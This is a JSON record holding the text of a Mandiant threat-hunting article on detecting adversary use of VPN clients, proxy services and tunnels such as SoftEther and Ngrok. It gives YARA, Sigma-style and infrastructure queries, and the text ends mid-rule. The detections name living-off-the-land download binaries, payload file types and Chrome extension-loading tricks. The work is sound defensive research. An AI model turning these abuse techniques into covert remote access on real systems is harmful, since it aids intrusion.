{ "id": "8cecf506-ef52-4638-a561-8d1c0340e338", "created_at": "2026-04-06T00:08:12.065537Z", "updated_at": "2026-04-10T03:37:04.078884Z", "deleted_at": null, "sha1_hash": "a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35", "title": "Burrowing your way into VPNs, Proxies, and Tunnels", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 204671, "plain_text": "Burrowing your way into VPNs, Proxies, and Tunnels\r\nBy Mandiant\r\nPublished: 2022-06-29 · Archived: 2026-04-05 14:15:44 UTC\r\nTo understand VPN software, one must understand a VPN: A virtual private network is an encrypted connection\r\nover the Internet from a device to a network. The encrypted connection helps ensure that sensitive data is safely\r\ntransmitted. It prevents unauthorized people from eavesdropping on the traffic and allows the user to conduct\r\nwork remotely.\r\nIn the following, VPN software will be defined as any software artifacts which facilitate the use of a VPN\r\nconnection (SoftEther VPN Client, OpenVPN Client, etc).\r\nIn computer science a proxy is a server which resides between the client making a request and the requested\r\ndestination server. Proxies can be used for multiple purposes including network log collection, cache repository,\r\nand providing anonymized internet access. A proxy service is an online resource that allows a user to get the\r\nbenefits of a proxy with none of the infrastructure concerns (RSocks, HideMyAss, Hide.Me, etc).\r\nBoth VPN software and proxy services facilitate the outbound connection from client to server, while localhost\r\ntunneling is similar, it facilitates the connection from the external network back to the client. This is done by what\r\nis commonly called “exposing localhost” (Ngrok, LocalTunnel, Localhost.Run, etc).\r\nBrainstorming over the different hunt and detection directions led to the following conclusion: Detection of\r\nlegitimate software and services at this scale cannot be a narrow implementation of a single detection discipline,\r\nbut rather, expand across multiple disciplines.\r\nInitiating a large-scale hunting and detection operation like this requires brainstorming through the, hopefully\r\nmany, different hunting and detection options available to each organization. For example: should the organization\r\nhave no ability to run snort signatures against network traffic then that type of direction can take the backseat to\r\nother primary detection methods.\r\nAdditionally, when hunting for a technology being utilized as a methodology it is easy to fall into a “whac-a-vendor” type approach focusing on each vendor’s version of the technology (i.e. Detection on SoftEther,\r\nNordVPN, Ngrok, etc). This is not a terrible approach, as it has its merits, but is not ideal. In the following\r\nsections there will be detections highlighted covering SoftEther VPN, Ngrok, and others. These are covered due to\r\nthe threat dense nature of their use.The ideal hunting process would use more methodology driven detection,\r\nbeing more vendor agnostic, as highlighted in the following Hunting Direction sections.\r\nConcern: Adversaries may use innocuous files that house these VPN files inside of themselves to masquerade as\r\nsomething other than a remote access software.\r\nDirection: Use detection logic that can peer into the construct of the file itself to identify the VPN artifacts layered\r\nbelow the innocuous files.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 1 of 26\n\nThe following can be considered hunting detections and directions for a variety of files wrapped around VPN\r\nequities and/or VPN files.\r\nRich Text Format files with Embedded Hex Payloads\r\nOpen Office XML files with Embedded VPN Target Domains\r\nOptical Disc Image (ISO Image) files with VPN File or Domain References\r\nMach Object (Mach-O) file with VPN File or Domain References\r\nRTF Embedded Hex Payload with Hex VPN File References\r\nrule M_Hunting_VPNEngine_RTF_Embedded_1 {\r\n meta:\r\n description = \"Detects a suspicious string often used in PE files in a hex encoded object stream along wit\r\n author = \"Mandiant\"\r\n md5 = \"befec87a9742ba8e8f6e61e1133f55fb\"\r\n strings:\r\n $pe = \"546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465\" ascii\r\n $mz = /4d5a[a-zA-Z0-9]{19,21}ffff/\r\n $vpn1 = /56504e[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn2 = /76706e[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn3 = /70726f7879[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn4 = /50726f7879[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn5 = /50524f5859[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n condition:\r\n filesize \u003c 15MB and (uint16(0) == 0x5C7B) and ($pe or $mz) and (1 of ($vpn*))\r\n}\r\nOOXML with Embedded VPN Target Domains\r\nrule M_Hunting_VPNEngine_OOXML_Target_1\r\n {\r\n meta:\r\n description = \"Detects an external relationship link in an OOXML with a VPN or proxy domain.\"\r\n author = \"Mandiant\"\r\n strings:\r\n $relationship_external = /TargetMode=[\\\"\\']External[\\\"\\']/ ascii nocase wide\r\n $anchor = \"\"\r\n $s1 = \" Target=\" ascii nocase\r\n $s2 = \" TargetMode=\" ascii nocase\r\n $s3 = \" Type=\" ascii nocase\r\n $s4 = \" Id=\" ascii nocase\r\n $re = /Target=[\\\"\\'][^\\\"\\']{0,100}(vpn|proxy).{0,100}/ ascii nocase\r\n condition:\r\n (filesize \u003c 10KB) and $anchor and $relationship_external and (1 of ($s*)) and $re\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 2 of 26\n\n}\r\n \r\nISO Files with VPN File or Domain References\r\nrule M_Hunting_VPNEngine_ArchiveEngine_ISOWithEmbeddedVPN_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Looking for ISO files with embedded payloads utilizing VPN strings.\"\r\n md5 = \"4c5f27d28f369da5d5ecce947bb22943\"\r\n strings:\r\n $s1 = /vpn[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii nocase fullword\r\n $s2 = /proxy[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii nocase fullword\r\n $s3 = /vpn[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s4 = /proxy[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s5 = \"remote access\" ascii nocase wide fullword\r\n $s6 = /localhost[^a-zA-Z0-9]{0,5}tunnel/ ascii nocase fullword\r\n condition:\r\n uint32(0x8000) == 0x30444301 and uint32(0x8004) == 0x00013130 and any of them\r\n }\r\n \r\nMach-O Files with VPN File or Domain References\r\nrule M_Hunting_MacOS_VPNEngine_MachO_FEBeta_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule looks for Mach-O files with strings indicating relationship with a VPN client\r\n md5 = \"6de8cc7217cb3e0c235fcdde83b1140b\"\r\n strings:\r\n $s1 = /vpn[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii fullword nocase\r\n $s2 = /proxy[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii fullword nocase\r\n $s3 = /vpn[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s4 = /proxy[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s6 = /localhost[^a-zA-Z0-9]{0,5}tunnel/ ascii fullword nocase\r\n condition:\r\n filesize \u003c 15MB and (uint32(0) == 0xBEBAFECA or uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or\r\n }\r\n \r\nOOXML with Embedded Files with VPN Equities\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 3 of 26\n\n# author = \"Mandiant\" ; type = \"OOXML\" ; md5 =\r\n\"a2d34e8c543aef78766b37dcaa5f7686\"\r\nM_Hunting_VPNEngine_OOXML_Target_1;Engine:51-\r\n255,Container:CL_TYPE_ZIP,Target:0;(0\u00261\u00262)\u0026(3|4|5|6);3c3f786d6c;3c773a646f637\r\n56d656e74;353436383639373332303730373236663637373236313664;373637303665;35363\r\n5303465;37303732366637383739;35303732366637383739\r\nIntelligence gathering via VPN client configuration files\r\nConcern: Many VPN clients take configuration files as input, the client itself is the concern, however, the\r\nconfiguration files provide intelligence insight and potential pivot points.\r\nDirection: Use file-based analysis to identify common VPN client configuration files in public stores or on\r\nsystems where these files would not be expected.\r\nSoftEther VPN Configuration Identification\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"2586bb9e27a4b3da4ed0f5d15883f84e\"\r\n description = \"Rule looks for SoftEther config file.\"\r\n strings:\r\n $configfile = \"Software Configuration File\" ascii fullword\r\n $softether1 = \"softether\" ascii fullword nocase\r\n $softether2 = \"EnableSoftEtherKernelModeDriver\" nocase\r\n $topFields1 = \"ListenerList\"\r\n $topFields2 = \"LocalBridgeList\"\r\n $topFields3 = \"ServerConfiguration\"\r\n $topFields4 = \"VirtualHUB\"\r\n condition:\r\n filesize \u003c 1MB and $configfile and (1 of ($softether*)) and (1 of ($topFields*))\r\n }\r\n \r\nNgrok VPN Configuration Identification\r\nrule M_Hunting_VPNEngine_NgrokConfig_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for Ngrok YML config file.\"\r\n md5 = \"5d1dbfdc47e820605fedabb98cf17dd5\"\r\n strings:\r\n $header = \"authtoken:\" ascii\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 4 of 26\n\n$tokenRE = /authtoken:\\s+[a-zA-Z0-9]{24,30}_[a-zA-Z0-9]{16,22}/ ascii\r\n $tunnel = \"tunnels:\" ascii\r\n condition:\r\n filesize \u003c 1MB and $header in (0..20) and $tokenRE and $tunnel\r\n }\r\n rule M_Hunting_VPNEngine_NgrokConfig_2\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for Ngrok YML config file.\"\r\n md5 = \"5d1dbfdc47e820605fedabb98cf17dd5\"\r\n strings:\r\n $header = \"authtoken:\" ascii\r\n $tokenRE = /authtoken:\\s[a-zA-Z0-9]{26,30}_[a-zA-Z0-9]{19,22}/ ascii\r\n condition:\r\n filesize \u003c 1MB and $header at 0 and $tokenRE\r\n }\r\n \r\nProcess execution that is masquerading as something other than what it is, a VPN client or software.\r\nConcern: It is common to see binaries with modified names, like this SoftEther VPN Bridge renamed as\r\niexplore.exe and conhost.exe, and other aspects to mask the true purpose of the file.\r\nDirection: Avoid relying solely on filename-based detections hunting more for methodologies that will detect\r\nnamed or renamed processes, files, etc. Use process-based detection logic to identify switches, actions, and\r\nconnections common to VPN components. Even lean on string-based equities to identify a binary’s true identity or\r\nintent.\r\nSoftEther VPN Detection by Network Connections\r\ntitle: 'Renamed SoftEtherVPN by Network Connections (METHODOLOGY)'\r\n description: 'Detect the activity of a renamed SoftEther VPN binary by detecting known domain connections.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionDomain:\r\n urlMonitorEvent Hostname|contains:\r\n - 'get-my-ip.ddns.softether-network.net'\r\n - 'keepalive.softether.org'\r\n - 'update-check.softether-network.net'\r\n urlMonitorEvent Hostname|re: 'vpn[0-9a-zA-Z]{1,50}\\.softether.net'\r\n filterProcessName:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 5 of 26\n\nurlMonitorEvent Process|contains:\r\n - 'softether'\r\n - 'vpnbridge'\r\n - 'vpnclient'\r\n - 'vpncmgr'\r\n - 'vpngateplugin'\r\n - 'vpninstall'\r\n - 'vpnserver'\r\n - 'vpnsetup'\r\n - 'vpnmgr'\r\n - 'zsatunnel'\r\n condition: selectionDomain and not filterProcessName\r\n fields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent Type\"\r\n - \"urlMonitorEvent Commandline\"\r\n falsepositives:\r\n - \"Known proxy services like ZScaler.\"\r\n level: \"medium\"\r\n \r\nSoftEther VPN Detection by Registry Modifications\r\ntitle: 'Renamed SoftEtherVPN by Registry Modifications (METHODOLOGY)'\r\n description: 'Detect the activity of a SoftEther VPN binary by detecting registry modifications.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionType:\r\n regKeyEvent Type: 1\r\n selectionStaticPath:\r\n regKeyEvent Path|contains: 'System\\CurrentControlSet\\Services\\SEVPNCLIENT'\r\n selectionREPath:\r\n regKeyEvent Path|re: 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\[a-zA-Z0-9_\\s-]{0,100}?SoftEt\r\n condition: selectionType and (selectionStaticPath or selectionREPath)\r\n fields:\r\n - \"regKeyEvent Process\"\r\n - \"regKeyEvent Path\"\r\n - \"regKeyEvent Key\"\r\n - \"regKeyEvent Value\"\r\n falsepositives:\r\n - \"Unknown\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 6 of 26\n\nlevel: \"medium\"\r\n \r\nGeneric VPN Switches from Commandline (Hunting)\r\nHunting for common VPN equities in process commandline switches to include but not limited to vpn, proxy, sstp,\r\nand l2tp.\r\n title: 'VPN-like Process with Known Switches (METHODOLOGY)'\r\n description: 'Detect suspected VPN binaries by known commandline switches.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionProcessType:\r\n processEvent eventType: \"start\"\r\n selectionSwitchOptions1:\r\n processEvent processCmdLine|contains:\r\n - ' --vpn'\r\n - ' --proxy'\r\n selectionSwitchOptionsMethod1:\r\n processEvent processCmdLine|contains:\r\n - 'ssl'\r\n - 'l2tp'\r\n - 'sstp'\r\n selectionSwitchOptions2:\r\n processEvent processCmdLine|contains:\r\n - 'vpn'\r\n - 'proxy'\r\n selectionSwitchOptionsMethod2:\r\n processEvent processCmdLine|contains:\r\n - ' --ssl'\r\n - ' --l2tp'\r\n - ' --sstp'\r\n condition: selectionProcessType and ((selectionSwitchOptions1 and selectionSwitchOptionsMethod1) or (selec\r\n fields:\r\n - \"processEvent processCmdLine\"\r\n - \"processEvent Process\"\r\n - \"processEvent Username\"\r\n - \"processEvent Md5\"\r\n falsepositives:\r\n - \"Unknown\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 7 of 26\n\nlevel: \"low\"\r\n \r\nGeneric VPN Domains from the Process (Hunting)\r\nIdentifying processes that initiate a network connection to VPN or proxy domains with the following regular\r\nexpression.\r\n(vpn|proxy)\\.[^.]{1,100}\\.(net|com|org|io|ru)\r\nThis leans heavily on a common practice to use domains in the format of vpn.company[.]com or\r\nproxy.company[.]com. While this is not completely inclusive, it leads to enough hunting opportunities to get\r\nstarted and if they are exhausted the regular expression can be loosened.\r\n title: 'Generic VPN Domains from the Process (Hunting)'\r\n description: 'Identifying processes that initiate a network connection to VPN or proxy domains with the follow\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionDomain:\r\n urlMonitorEvent Hostname|re:\r\n - 'vpn\\.[^.]{1,100}\\.(net|com|org|io)'\r\n - 'proxy\\.[^.]{1,100}\\.(net|com|org|io)'\r\n filterProcessName:\r\n urlMonitorEvent Process|contains:\r\n - 'proxy'\r\n - 'vpn'\r\n \r\n condition: selectionDomain and not filterProcessName\r\n fields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent Type\"\r\n - \"urlMonitorEvent Commandline\"\r\n falsepositives:\r\n - \"Known proxy services like ZScaler.\"\r\n - \"Other legitimate in-house proxies.\"\r\n level: \"low\"\r\n \r\nGeneric VPN User Agents from the Process (Hunting)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 8 of 26\n\nIdentifying the use of legitimate VPN agents leads to a plethora of hunting opportunities. Searching for VPN and\r\nproxy keywords within HTTP user-agent strings will drive these opportunities. Applying tuning with a known\r\nauthorized software list or authorized VPN/proxy domains can reduce false positives.\r\n title: 'Generic VPN User Agents from the Process (Hunting)'\r\n description: 'Searching for VPN and proxy keywords within HTTP user-agent strings.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionUserAgent:\r\n urlMonitorEvent userAgent|contains:\r\n - 'proxy'\r\n - 'vpn'\r\n filterHostname:\r\n urlMonitorEvent Hostname|contains:\r\n - 'vpn'\r\n - 'proxy'\r\n condition: selectionUserAgent and not filterHostname\r\n fields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent Type\"\r\n - \"urlMonitorEvent Commandline\"\r\n falsepositives:\r\n - \"Known proxy services like ZScaler.\"\r\n - \"Other legitimate in-house proxies.\"\r\n - \"FortiSSLVPN\"\r\n - \"GoogleImageProxy\"\r\n - \"ESET Security proxy detection\"\r\n level: \"low\"\r\n \r\nGeneric SoftEther VPN Equities (Hunting)\r\nUtilizing unique equities to detect known SoftEther functionality within a binary will help bypass process name\r\ndetection and identify functionality - such as with UNC3500 in the use-case discussed below.\r\n rule M_Hunting_Linux_VPNEngine_GenericSoftEther_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 9 of 26\n\ndescription = \"Rule looks for SoftEther generic terms in samples.\"\r\n strings:\r\n $domain = \"update-check.softether-network.net\" ascii fullword\r\n $keepalive = \"keepalive.softether.org\"\r\n $vpn = \"SoftEther Corporation\" ascii fullword\r\n condition:\r\n filesize \u003c 10MB and uint32(0) == 0x464c457f and all of them\r\n }\r\n \r\nFiles or processes that, when executed, reach outbound and download a know VPN client\r\nConcern: There are hundreds of ways to perform remote downloads like using living off the land binaries or via\r\ncustom code. However, if a process is seen downloading a VPN client in a method that does not follow normal\r\nuser behavior, the intent may be to utilize this client for malicious behavior.\r\nDirection: Identify outbound connections to download VPN client software by living off the land binaries.\r\nLiving off the Land Binaries with VPN Domains\r\nA Living off the Land event describes a computer event in which actors use legitimate software and functions\r\navailable in the system to perform malicious actions on it. These legitimate software binaries are considered\r\nLiving off the Land Binaries (LoLBins) and when combined with VPN or proxy methodologies allow for robust\r\nand camouflaged operations.\r\nUtilizing process data to hunt for these LoLBins that have download functionality in combination with VPN and\r\nproxy domains may lead to identifying their abuse.\r\ntitle: 'Living off the Land Binaries with VPN Domains (Hunting)'\r\ndescription: 'Utilizing process data to hunt for LoLBins that have download functionality in combination with VP\r\nauthor: Mandiant\r\ndate: '2022-06-15'\r\nstatus: hunting\r\nlogsource:\r\n product: 'FireEye HX'\r\ndetection:\r\n selectionProcessName:\r\n urlMonitorEvent Process:\r\n - 'AppInstaller.exe'\r\n - 'Bitsadmin.exe'\r\n - 'CertOC.exe'\r\n - 'CertReq.exe'\r\n - 'Certutil.exe'\r\n - 'cmdl32.exe'\r\n - 'Desktopimgdownldr.exe'\r\n - 'Diantz.exe'\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 10 of 26\n\n- 'Esentutl.exe'\r\n - 'Expand.exe'\r\n - 'Extrac32.exe'\r\n - 'Findstr.exe'\r\n - 'Finger.exe'\r\n - 'GfxDownloadWrapper.exe'\r\n - 'Hh.exe'\r\n - 'Ieexec.exe'\r\n - 'Imewdbld.exe'\r\n - 'Makecab.exe'\r\n - 'MpCmdRun.exe'\r\n - 'PrintBrm.exe'\r\n - 'Replace.exe'\r\n - 'Squirrel.exe'\r\n - 'Wsl.exe'\r\n - 'Xwizard.exe'\r\n selectionUrl:\r\n urlMonitorEvent requestUrl|re: '[a-zA-Z0-9\\.]{0,50}(vpn|proxy)[a-zA-Z0-9\\.]{0,50}\\.exe'\r\n condition: selectionProcessName and selectionUrl\r\nfields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent requestUrl\"\r\n - \"urlMonitorEvent Commandline\"\r\nfalsepositives:\r\n - \"Unknown\"\r\nlevel: \"medium\"\r\nProxy Service Directions\r\nInfrastructure configured to receive VPN or proxy connections\r\nConcern: Host-based visibility may be a data source organizations lack, and therefore have difficulty identifying\r\nthese equities. This leads to lack of detection and hunting directions.\r\nDirection: Moving away from the host and into the internet infrastructure hunting, there are\r\nnumerous tools and data sources that allow for identifying infrastructure qualities, which may allow analysts to\r\nautomate the detection of certain VPN endpoints and servers.\r\nNote: This is relevant for all three technologies, VPN clients, proxy services, and tunnels.\r\nThe following includes a list of different hunting queries focusing in on specific and generic VPN or proxy\r\ninfrastructure.\r\nGeneric VPN and Proxy Domains\r\nGeneric VPN Certificates\r\nMeFound VPN Service\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 11 of 26\n\nHide.Me VPN Service\r\nOpenVPN Services\r\nCisco IOS SSL VPN Services\r\nWireguard VPN Infrastructure\r\nSoftEther VPN Infrastructure\r\nNgrok Service Infrastructure\r\nGeneric VPN and Proxy\r\nVPN Domain\r\nservices.tls.certificates.leaf_data.issuer.common_name:/.*\\.vpn\\..*\\.[a-z]{1,4}/\r\nProxy Domain\r\nservices.tls.certificates.leaf_data.issuer.common_name:/.*\\.proxy\\..*\\.[a-z]{1,4}/\r\nGeneric VPN Cert CN and Org\r\nGeneric VPN Certificate Common Name and Organization\r\nparsed.issuer.common_name:\"VPN\" and parsed.subject.organization:\"VPN\"\r\nOther VPN Service Domains\r\nMeFound\r\nservices.tls.certificates.leaf_data.issuer.common_name:/[^\\.]+\\.mefound\\.com/\r\nor\r\nservices.tls.certificates.leaf_data.subject.common_name:/[^\\.]+\\.mefound\\.com/\r\nor services.tls.certificates.leaf_data.names:/[^\\.]+\\.mefound\\.com/\r\nHide.Me Proxy Server\r\nservices.tls.certificates.leaf_data.names:/.*hide\\.me.*/ services.tls.certificates.leaf_data.names=hideservers\r\nOpenVPN\r\nservices.tls.certificates.leaf_data.subject.organization:\"ocvpn\" or\r\nservices.tls.certificates.leaf_data.subject.common_name:\"ocvpn\"\r\nCisco IOS SSL VPN\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 12 of 26\n\nservices.http.response.headers.set_cookie:/webvpn[a-z]*=.*/\r\nWireguard\r\n(services.http.response.html_title:/.*WireGuard VPN.*/) or\r\n(services.http.response.body:/.*Wireguard VPN.*/)\r\n(services.http.response.html_title:/.*Wireguard.*/ or\r\nservices.http.response.body:/.*Wireguard.*/) and not\r\n((services.http.response.html_title:/.*WireGuard VPN.*/) or\r\n(services.http.response.body:/.*Wireguard VPN.*/)) and not\r\n((services.http.response.html_title:/.*Turnkey WireGuard.*/) or\r\n(services.http.response.body:/.*Turnkey Wireguard.*/))\r\nSoftEther\r\nSoftEther on Abused IP Space\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*\\.softether\\.net/\r\nAND autonomous_system.name=`HETZNER-AS`\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*softether.net/\r\nAND autonomous_system.name=`DIGITALOCEAN-ASN`\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*softether.net/\r\n AND autonomous_system.name=`AS-CHOOPA`\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*\\.softether\\.net/\r\nAND autonomous_system.name=`OVH`\r\nUntrusted SoftEther Certificates\r\nUntrusted VPN Custom SoftEther Certificates\r\nparsed.subject.common_name:/vpn[0-9]{1,15}\\.softether\\.net/ AND tags.raw:\r\n\"untrusted\" AND NOT parsed.subject.common_name:/vpn[0-9]\r\n{1,15}\\.softether\\.net/\r\nUntrusted VPN Non-Custom SoftEther Certificates\r\nparsed.subject.common_name:/vpn[0-9]{1,15}\\.softether\\.net/ AND tags.raw:\r\n\"untrusted\"\r\nSoftEther Generic\r\nSoftEther VPN Domain on Certificate\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 13 of 26\n\nsame_service(services.tls.certificates.leaf_data.issuer.common_name:/.*\\.softether\\.net/\r\nAND services.port:443)\r\nHTTP/S SoftEther VPN IPs\r\nsame_service(services.tls.certificates.leaf_data.issuer.common_name:/.*\\.softether\\.net/\r\nAND (services.service_name=`HTTP` OR\r\nservices.extended_service_name=`HTTPS`))\r\nNon-US IP hosting SoftEther VPN domain\r\nsame_service(services.tls.certificates.leaf_data.subject.common_name:/vpn.*softether.net/\r\nAND NOT services.tls.certificates.leaf_data.issuer.country:\"US\")\r\nNgrok Domains\r\nNgrok Domain\r\nservices.tls.certificates.leaf_data.names:/.*ngrok.*/\r\nNgrok Inspect Service\r\nsame_service(services.http.request.uri:/.*inspect.*/ and\r\nservices.http.request.uri:/.*http.*/ and\r\nservices.http.response.html_title:\"ngrok\")\r\nProtonVPN\r\nProton VPN Services\r\nservices.tls.certificates.leaf_data.issuer.organizational_unit:protonvpn or\r\nservices.http.response.html_title:protonvpn\r\nBrowser Extensions used for Proxy Services\r\nConcern: Many proxy services have a companion browser extension and, while not commonly observed, may\r\nallow an adversary to use this service.\r\nAdditionally, adversaries may use loader functionality to access VPN or proxy services via Chrome. This could be\r\nobserved in PowerShell loader scripts or LNK files where the --load-extension switch can be used with Chrome to\r\nload a specific extension.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 14 of 26\n\nDirection: Narrow focus in file analysis to browser extension artifacts and then within said artifacts for VPN\r\nequities. This can be done directly against browser extension manifest files or portable executable files.\r\nLoading Chrome VPN or Proxy Extension\r\nrule M_METHODOLOGY_VPNEngine_LoadVPNProxyChromeExtension_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule that looks for files containing strings pertaining to execution of Chrome to\r\n strings:\r\n $r1 = /chrome[^\\r\\n]*?--load-extension=/ ascii nocase wide\r\n $s1 = \"chrome\" ascii wide\r\n $s2 = \"--load-extension=\" ascii wide\r\n $p1 = \"vpn\" ascii wide fullword nocase\r\n $p2 = \"proxy\" ascii wide fullword nocase\r\n condition:\r\n filesize \u003c 50KB and all of ($s*) and $r1 and ($p1 or $p2)\r\n}\r\nChrome Extension Manifest File for Proxies\r\nrule M_Hunting_VPNEngine_ChromeExtensions_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"995f7d9ca805cce59acbeff82ed4adc6\"\r\n strings:\r\n $manifest1 = \"\\\"manifest_version\\\":\" ascii nocase\r\n $manifest2 = \"\\\"name\\\":\" ascii nocase\r\n $manifest3 = \"\\\"version\\\":\" ascii nocase\r\n $optional1 = \"\\\"author\\\":\" ascii nocase\r\n $optional2 = \"\\\"browser_action\\\":\" ascii nocase\r\n $optional3 = \"\\\"content_security_policy\\\":\" ascii nocase\r\n $optional4 = \"\\\"default_icon\\\":\" ascii nocase\r\n $optional5 = \"\\\"default_locale\\\":\" ascii nocase\r\n $optional6 = \"\\\"default_title\\\":\" ascii nocase\r\n $optional7 = \"\\\"description\\\":\" ascii nocase\r\n $optional8 = \"\\\"differential_fingerprint\\\":\" ascii nocase\r\n $optional9 = \"\\\"icons\\\":\" ascii nocase\r\n $optional10 = \"\\\"permissions\\\":\" ascii nocase\r\n $optional11 = \"\\\"background\\\":\" ascii nocase\r\n $anchorre1 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre2 = /\\\"description\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre3 = /\\\"name\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre4 = /\\\"short_name\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 15 of 26\n\n$anchorre5 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre6 = /\\\"description\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre7 = /\\\"name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre8 = /\\\"short_name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n condition:\r\n filesize \u003c 1MB and $manifest1 and $manifest2 and $manifest3 and (2 of ($optional*)) and (1 of ($anchorre\r\n}\r\nChrome Extension Equities in a Binary\r\nrule M_Hunting_VPNEngine_ChromeExtensionInBinary_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"2e09a136e40143ed3317c9ce6ea027a6\"\r\n strings:\r\n $manifest1 = \"\\\"manifest_version\\\":\" ascii nocase\r\n $manifest2 = \"\\\"name\\\":\" ascii nocase\r\n $manifest3 = \"\\\"version\\\":\" ascii nocase\r\n $optional1 = \"\\\"author\\\":\" ascii nocase\r\n $optional2 = \"\\\"browser_action\\\":\" ascii nocase\r\n $optional3 = \"\\\"content_security_policy\\\":\" ascii nocase\r\n $optional4 = \"\\\"default_icon\\\":\" ascii nocase\r\n $optional5 = \"\\\"default_locale\\\":\" ascii nocase\r\n $optional6 = \"\\\"default_title\\\":\" ascii nocase\r\n $optional7 = \"\\\"description\\\":\" ascii nocase\r\n $optional8 = \"\\\"differential_fingerprint\\\":\" ascii nocase\r\n $optional9 = \"\\\"icons\\\":\" ascii nocase\r\n $optional10 = \"\\\"permissions\\\":\" ascii nocase\r\n $optional11 = 